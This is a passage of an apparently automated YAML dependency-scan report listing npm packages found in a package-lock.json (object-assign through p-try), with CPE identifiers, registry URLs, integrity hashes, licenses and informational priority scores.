- cpe: cpe:2.3:a:normalize:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/normalize-svg-path@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/normalize-svg-path/-/normalize-svg-path-1.1.0.tgz
|
|
integrity: sha512-r9KHKG2UUeB5LoTouwDzBy2VxXlHsiM6fyLQvnJa0S5hrhzqElH/CH7TUGhT1fVvIYBIKf3OpY4YJ4CK+iaqHg==
|
|
dependencies:
|
|
svg-arc-to-cubic-bezier: ^3.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bb2a72a38fc8e367
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: object-assign 4.1.1'
|
|
title: object-assign 4.1.1
|
|
description: 'Package discovered: object-assign 4.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d7b65c8670c0c943
|
|
name: object-assign
|
|
version: 4.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:object-assign:object-assign:4.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object-assign:object_assign:4.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object_assign:object-assign:4.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object_assign:object_assign:4.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object:object-assign:4.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object:object_assign:4.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/object-assign@4.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz
|
|
integrity: sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7280439ae019eb34
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: object-hash 3.0.0'
|
|
title: object-hash 3.0.0
|
|
description: 'Package discovered: object-hash 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f0415e28bd0fa73d
|
|
name: object-hash
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:object-hash:object-hash:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object-hash:object_hash:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object_hash:object-hash:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object_hash:object_hash:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object:object-hash:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object:object_hash:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/object-hash@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz
|
|
integrity: sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 570f098417dfedef
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: object-inspect 1.13.4'
|
|
title: object-inspect 1.13.4
|
|
description: 'Package discovered: object-inspect 1.13.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 67701f4036faa68d
|
|
name: object-inspect
|
|
version: 1.13.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:object-inspect:object-inspect:1.13.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object-inspect:object_inspect:1.13.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object_inspect:object-inspect:1.13.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object_inspect:object_inspect:1.13.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object:object-inspect:1.13.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:object:object_inspect:1.13.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/object-inspect@1.13.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz
|
|
integrity: sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 276b1e3a3b3501f5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: on-finished 2.3.0'
|
|
title: on-finished 2.3.0
|
|
description: 'Package discovered: on-finished 2.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3329ff372baa3c68
|
|
name: on-finished
|
|
version: 2.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:on-finished:on-finished:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on-finished:on_finished:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on_finished:on-finished:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on_finished:on_finished:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on:on-finished:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on:on_finished:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/on-finished@2.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz
|
|
integrity: sha512-ikqdkGAAyf/X/gPhXGvfgAytDZtDbr+bkNUJ0N9h5MI/dmdgCs3l6hoHrcUv41sRKew3jIwrp4qQDXiK99Utww==
|
|
dependencies:
|
|
ee-first: 1.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1ede69e18336ab8f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: on-finished 2.4.1'
|
|
title: on-finished 2.4.1
|
|
description: 'Package discovered: on-finished 2.4.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9c42ff2fa50e9c68
|
|
name: on-finished
|
|
version: 2.4.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:on-finished:on-finished:2.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on-finished:on_finished:2.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on_finished:on-finished:2.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on_finished:on_finished:2.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on:on-finished:2.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on:on_finished:2.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/on-finished@2.4.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz
|
|
integrity: sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==
|
|
dependencies:
|
|
ee-first: 1.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 01ce9d2b89e4c438
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: on-headers 1.1.0'
|
|
title: on-headers 1.1.0
|
|
description: 'Package discovered: on-headers 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c535b114447926f1
|
|
name: on-headers
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:on-headers:on-headers:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on-headers:on_headers:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on_headers:on-headers:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on_headers:on_headers:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on:on-headers:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:on:on_headers:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/on-headers@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/on-headers/-/on-headers-1.1.0.tgz
|
|
integrity: sha512-737ZY3yNnXy37FHkQxPzt4UZ2UWPWiCZWLvFZ4fu5cueciegX0zGPnrlY6bwRg4FdQOe9YU8MkmJwGhoMybl8A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bd9248df9b4e52cf
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: once 1.4.0'
|
|
title: once 1.4.0
|
|
description: 'Package discovered: once 1.4.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3f85171a571bc28a
|
|
name: once
|
|
version: 1.4.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:once:once:1.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/once@1.4.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/once/-/once-1.4.0.tgz
|
|
integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==
|
|
dependencies:
|
|
wrappy: '1'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 92e0060edd98f736
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: otplib 12.0.1'
|
|
title: otplib 12.0.1
|
|
description: 'Package discovered: otplib 12.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7b45ff9710a4aaac
|
|
name: otplib
|
|
version: 12.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:otplib:otplib:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/otplib@12.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz
|
|
integrity: sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg==
|
|
dependencies:
|
|
'@otplib/core': ^12.0.1
|
|
'@otplib/preset-default': ^12.0.1
|
|
'@otplib/preset-v11': ^12.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1061878b64866643
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: p-limit 2.3.0'
|
|
title: p-limit 2.3.0
|
|
description: 'Package discovered: p-limit 2.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c6cc7a145d3e597c
|
|
name: p-limit
|
|
version: 2.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:p-limit:p-limit:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p-limit:p_limit:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p_limit:p-limit:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p_limit:p_limit:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p:p-limit:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p:p_limit:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/p-limit@2.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz
|
|
integrity: sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==
|
|
dependencies:
|
|
p-try: ^2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6cbc6aaefd17b7fc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: p-limit 3.1.0'
|
|
title: p-limit 3.1.0
|
|
description: 'Package discovered: p-limit 3.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bdf7b3073a60eac3
|
|
name: p-limit
|
|
version: 3.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:p-limit:p-limit:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p-limit:p_limit:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p_limit:p-limit:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p_limit:p_limit:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p:p-limit:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p:p_limit:3.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/p-limit@3.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz
|
|
integrity: sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==
|
|
dependencies:
|
|
yocto-queue: ^0.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 16add8edeff36c6a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: p-locate 4.1.0'
|
|
title: p-locate 4.1.0
|
|
description: 'Package discovered: p-locate 4.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ee16619fa3035ca6
|
|
name: p-locate
|
|
version: 4.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:p-locate:p-locate:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p-locate:p_locate:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p_locate:p-locate:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p_locate:p_locate:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p:p-locate:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p:p_locate:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/p-locate@4.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz
|
|
integrity: sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==
|
|
dependencies:
|
|
p-limit: ^2.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 94f4f30dde8856c2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: p-try 2.2.0'
|
|
